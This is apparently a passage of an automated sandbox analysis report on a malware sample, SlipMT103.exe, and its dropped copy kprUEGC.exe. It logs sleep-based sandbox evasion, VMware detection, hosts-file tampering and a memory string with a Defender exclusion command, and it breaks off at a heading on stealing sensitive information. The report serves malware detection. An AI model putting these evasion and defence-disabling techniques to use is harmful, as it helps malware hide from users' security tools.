                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -239640s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -239529s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -239421s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -239312s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -239188s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -239059s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -238936s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -238778s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -238640s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -238531s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -238420s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -238312s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -238047s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -237641s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -237438s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -237250s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -236641s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -236188s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -236047s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6420Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6912Thread sleep time: -24903104499507879s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6920Thread sleep count: 1732 > 30
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6920Thread sleep count: 8087 > 30
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 4544Thread sleep count: 1933 > 30
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -239860s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 4544Thread sleep count: 1463 > 30
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5524Thread sleep time: -34928s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -239688s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -239578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -239469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -239359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -239250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -239125s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -239016s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -238891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -238750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -238547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -238422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -238094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -237922s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -237811s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -237703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -237594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -237391s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -237000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -236750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -236438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -235094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -234797s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -234671s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 348Thread sleep time: -234547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5100Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6868Thread sleep time: -27670116110564310s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6796Thread sleep count: 6267 > 30
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6796Thread sleep count: 3552 > 30
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239859
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239750
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239640
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239529
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239421
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239312
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239188
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239059
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238936
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238778
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238640
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238531
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238420
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238312
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238047
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 237641
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 237438
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 237250
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 236641
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 236188
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 236047
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239860
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239688
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239578
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239469
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239359
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239250
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239125
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239016
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 238891
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 238750
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 238547
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 238422
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 238094
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237922
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237811
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237703
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237594
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237391
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237000
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 236750
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 236438
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 235094
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 234797
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 234671
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 234547
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SlipMT103.exeWindow / User API: threadDelayed 1554
                      Source: C:\Users\user\Desktop\SlipMT103.exeWindow / User API: threadDelayed 713
                      Source: C:\Users\user\Desktop\SlipMT103.exeWindow / User API: threadDelayed 1732
                      Source: C:\Users\user\Desktop\SlipMT103.exeWindow / User API: threadDelayed 8087
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 1933
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 1463
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 6267
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 3552
                      Source: C:\Users\user\Desktop\SlipMT103.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SlipMT103.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239859
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 40889
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239750
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239640
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239529
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239421
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239312
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239188
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 239059
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238936
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238778
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238640
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238531
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238420
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238312
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 238047
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 237641
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 237438
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 237250
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 236641
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 236188
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 236047
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SlipMT103.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239860
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 34928
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239688
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239578
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239469
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239359
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239250
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239125
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 239016
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 238891
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 238750
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 238547
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 238422
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 238094
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237922
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237811
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237703
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237594
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237391
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 237000
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 236750
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 236438
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 235094
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 234797
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 234671
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 234547
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                      Source: kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00B8CE40 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\SlipMT103.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess created: C:\Users\user\Desktop\SlipMT103.exe C:\Users\user\Desktop\SlipMT103.exe
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                      Source: SlipMT103.exe, 00000001.00000002.625902273.0000000001160000.00000002.00020000.sdmp, kprUEGC.exe, 0000000C.00000002.623212644.00000000013E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: SlipMT103.exe, 00000001.00000002.625902273.0000000001160000.00000002.00020000.sdmp, kprUEGC.exe, 0000000C.00000002.623212644.00000000013E0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: SlipMT103.exe, 00000001.00000002.625902273.0000000001160000.00000002.00020000.sdmp, kprUEGC.exe, 0000000C.00000002.623212644.00000000013E0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: SlipMT103.exe, 00000001.00000002.625902273.0000000001160000.00000002.00020000.sdmp, kprUEGC.exe, 0000000C.00000002.623212644.00000000013E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Users\user\Desktop\SlipMT103.exe VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Users\user\Desktop\SlipMT103.exe VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
                      Source: C:\Users\user\Desktop\SlipMT103.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      Stealing of Sensitive Information:

                      barindex
